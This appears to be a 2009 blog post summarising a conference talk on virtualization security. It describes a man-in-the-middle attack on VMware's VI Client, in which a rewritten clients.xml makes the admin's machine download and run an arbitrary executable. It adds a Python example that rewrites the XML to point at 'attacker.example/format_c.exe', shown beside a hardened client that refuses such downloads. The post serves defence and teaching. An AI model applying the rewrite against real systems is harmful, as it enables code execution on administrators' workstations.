Thursday, 19 November 2009

Claudio Criscione - Virtualization security

Claudio gave a brilliant presentation today about virtualization security. Just a few bullet points from the talk.

  • It turns out that VMware's admin web interface is served by a bundled Tomcat, an oldie (shall I read that as "unpatched"?) but goldie, right?
  • You can MITM the VMware VI Client's connection to the server, and as shown in the demo it works like a charm, plus...
  • ... if you can MITM the connection you can pwn the box: the clients.xml that the server sends to the client contains the URL of the client .exe to download and execute. Boom, you can change that URL, and the admin's workstation runs whatever you point it at.
To give you an idea: during the live demo Claudio forced the admin's PC (the one running VI Client) to format drive C:, and there was no way to stop it; it kicked off right away.
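To make the clients.xml chain concrete, here is a small added example (my code, not Claudio's demo and not VMware's code): the on-path rewrite of the served XML, the trusting client that runs whatever URL it is handed, and a hardened client that refuses the download unless the URL is https on the server it actually connected to and the installer matches a pinned hash. The XML layout, element names, hosts and URLs are assumptions for illustration; they are not VMware's real format, and the "installer" is a constructed byte string.

```python
"""Added example, not from the talk or from VMware: a miniature of the
clients.xml update chain, with a hardened client beside the trusting one.
XML layout, element names, hosts and URLs below are assumptions."""
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed clients.xml as a management server might serve it (assumed format).
LEGIT_CLIENTS_XML = """<?xml version="1.0"?>
<ConfigRoot>
  <clientConnection>
    <version>2.5.0</version>
    <downloadUrl>https://vcenter.example.internal/client/VMware-viclient.exe</downloadUrl>
  </clientConnection>
</ConfigRoot>
"""

# Stand-in for the genuine installer (constructed bytes, not a real binary) and the
# SHA-256 the admin workstation is assumed to have pinned for it.
GENUINE_INSTALLER = b"genuine installer bytes (constructed stand-in)"
PINNED_SHA256 = hashlib.sha256(GENUINE_INSTALLER).hexdigest()


def mitm_rewrite(xml_text: str, attacker_url: str) -> str:
    """What an on-path attacker does: parse the served XML and swap the exe URL."""
    root = ET.fromstring(xml_text)
    for node in root.iter("downloadUrl"):
        node.text = attacker_url
    return ET.tostring(root, encoding="unicode")


def trusting_client(xml_text: str) -> str:
    """Vulnerable behaviour: whatever URL the server hands back is what gets run."""
    root = ET.fromstring(xml_text)
    return root.find("clientConnection/downloadUrl").text


def hardened_client(xml_text: str, connected_host: str, installer_bytes: bytes) -> str:
    """Added checks: https only, same host we connected to, and the downloaded
    installer must match the pinned hash before anything is executed."""
    url = trusting_client(xml_text)
    parsed = urlparse(url)
    if parsed.scheme != "https":
        raise ValueError(f"refusing non-https download URL: {url}")
    if parsed.hostname != connected_host:
        raise ValueError(f"download host {parsed.hostname!r} != server {connected_host!r}")
    if hashlib.sha256(installer_bytes).hexdigest() != PINNED_SHA256:
        raise ValueError("installer hash mismatch; not executing")
    return url


def would_execute(xml_text: str, connected_host: str, installer_bytes: bytes) -> bool:
    """True if the hardened client would run the installer named in xml_text."""
    try:
        hardened_client(xml_text, connected_host, installer_bytes)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    host = "vcenter.example.internal"
    evil = mitm_rewrite(LEGIT_CLIENTS_XML, "http://attacker.example/format_c.exe")
    print("trusting client would run:", trusting_client(evil))
    print("hardened client, genuine:", would_execute(LEGIT_CLIENTS_XML, host, GENUINE_INSTALLER))
    print("hardened client, rewritten:", would_execute(evil, host, b"trojan bytes"))
```

Note the order of the checks: the host comparison only helps if the client also validates the server's TLS certificate (an attacker who can impersonate the host passes it), so the pinned hash is the backstop that actually stops a swapped installer from running.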

There was much more than that; Xen and Ubuntu got their share too, but the practical demo was based on VMware.

Lessons learned?
Treat VM hosts and their management apps as just another computer, another system, and make sure you secure them the same way as any other system. Think about patch management and what happens when you revert to a snapshot (it may be old and unpatched, so you bring back an unpatched or already compromised system), and think about separation of duties and access (physical and logical).